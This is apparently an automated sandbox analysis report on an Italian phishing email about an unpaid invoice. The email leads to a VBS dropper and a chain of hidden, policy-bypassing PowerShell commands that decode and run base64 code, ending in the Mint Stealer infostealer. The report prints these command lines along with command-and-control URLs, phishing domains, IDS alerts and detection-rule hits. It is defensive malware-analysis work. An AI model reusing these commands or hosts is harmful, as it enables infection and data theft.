
Windows Analysis Report
I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg

Overview

General Information

Sample name: I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg
Analysis ID: 1557495
MD5: cb84c33545673307198ca7dc864e8e5f
SHA1: f9cbb6e67738eb8235d03d7df218aeea6e510ec9
SHA256: 396e4d924a45d551c2c8bcfd147112bbe3128885e22e1e7a593006117759132b

Detection

Mint Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
Yara detected Mint Stealer
Yara detected Powershell decode and execute
AI detected potential phishing Email
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Office Autorun Keys Modification
Sigma detected: Suspicious Electron Application Child Processes
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64_ra
  • svchost.exe (PID: 7040 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • OUTLOOK.EXE (PID: 2952 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 5668 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "E581CB4A-9BB8-4348-8486-140C3ED4F7CF" "00D1D5C8-8F94-47CD-842C-62D6A2C573DE" "2952" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 7144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2024,i,7829079969028914035,538796100542532529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • wscript.exe (PID: 8124 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 5164 cmdline: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6732 cmdline: "C:\Windows\system32\cmd.exe" /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 1252 cmdline: powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 6228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • powershell.exe (PID: 7556 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • powershell.exe (PID: 1304 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1 | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |

Source | Rule | Description | Author | Strings
00000013.00000002.1995057086.00000241A5DD1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
00000013.00000002.1995057086.00000241A4917000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L, ParentImage: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentProcessId: 6556, ParentProcessName: chrome.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , ProcessId: 8124, ProcessName: wscript.exe
Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6228, TargetFilename: C:\Users\Public\Documents\ANwibhLHfyrt.ps1
Source: Process started | Author: frack113 | Data: Command: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat", CommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8124, ParentProcessName: wscript.exe, ProcessCommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat", ProcessId: 5164, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 2952, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L, ParentImage: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentProcessId: 6556, ParentProcessName: chrome.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , ProcessId: 8124, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L, ParentImage: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentProcessId: 6556, ParentProcessName: chrome.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , ProcessId: 8124, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat", CommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 8124, ParentProcessName: wscript.exe, ProcessCommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat", ProcessId: 5164, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6228, TargetFilename: C:\Users\Public\Documents\ANwibhLHfyrt.ps1
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7040, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-18T10:45:27.939903+0100 | 2057063 | 1 | A Network Trojan was detected | 192.168.2.18 | 49713 | 168.100.9.29 | 80 | TCP
2024-11-18T10:45:41.472487+0100 | 2038755 | 3 | Misc activity | 192.168.2.18 | 49858 | 1.1.1.1 | 53 | UDP
2024-11-18T10:45:27.939903+0100 | 2858291 | 1 | A Network Trojan was detected | 192.168.2.18 | 49713 | 168.100.9.29 | 80 | TCP

Phishing

Source: Email | Joe Sandbox AI: Detected potential phishing email: Contains a suspicious external link to 'livecasinotipuk.com' which is not a legitimate business domain. Uses urgency and threats of legal action to pressure recipient into clicking the link. Claims to be about an unpaid invoice but provides no legitimate payment methods, only a suspicious link
Source: unknown | HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.18:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.18:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.18:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.18:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 51.91.79.17:443 -> 192.168.2.18:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 2.23.209.168:443 -> 192.168.2.18:49717 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Child: C:\Windows\System32\wscript.exe
Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: chrome.exe | Memory has grown: Private usage: 7MB, later: 27MB

Networking

Source: Network traffic | Suricata IDS: 2856654 - Severity 1 - ETPRO MALWARE TA582 CnC Checkin : 192.168.2.18:49714 -> 206.188.196.37:80
Source: Network traffic | Suricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.18:49713 -> 168.100.9.29:80
Source: Network traffic | Suricata IDS: 2858291 - Severity 1 - ETPRO MALWARE TA582 CnC Checkin : 192.168.2.18:49713 -> 168.100.9.29:80
Source: Network traffic | Suricata IDS: 2038755 - Severity 3 - ET MALWARE Observed DNS Query to Temporary File Hosting Domain (temp .sh) : 192.168.2.18:49858 -> 1.1.1.1:53
Source: unknown | TCP traffic detected without corresponding DNS query: 40.126.32.136
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: global traffic | HTTP traffic detected: GET /1.php?s=mints13 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: rigzuvzi3bnz3.top | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /thovl94iuyhtr.php?id=user-PC&key=33431133382&s=mints13 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: danknlmmaahlimg.top | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | DNS traffic detected: DNS query: rigzuvzi3bnz3.top
Source: global traffic | DNS traffic detected: DNS query: danknlmmaahlimg.top
Source: global traffic | DNS traffic detected: DNS query: temp.sh
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.18:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.18:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.18:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.18:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 51.91.79.17:443 -> 192.168.2.18:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 2.23.209.168:443 -> 192.168.2.18:49717 version: TLS 1.2

System Summary

Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 3393
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 3393
Source: classification engine | Classification label: mal100.troj.expl.evad.winMSG@34/32@7/187
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | File created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241118T0444360487-2952.etl
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "E581CB4A-9BB8-4348-8486-140C3ED4F7CF" "00D1D5C8-8F94-47CD-842C-62D6A2C573DE" "2952" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2024,i,7829079969028914035,538796100542532529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "E581CB4A-9BB8-4348-8486-140C3ED4F7CF" "00D1D5C8-8F94-47CD-842C-62D6A2C573DE" "2952" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=2024,i,7829079969028914035,538796100542532529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Fattura87157159.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat
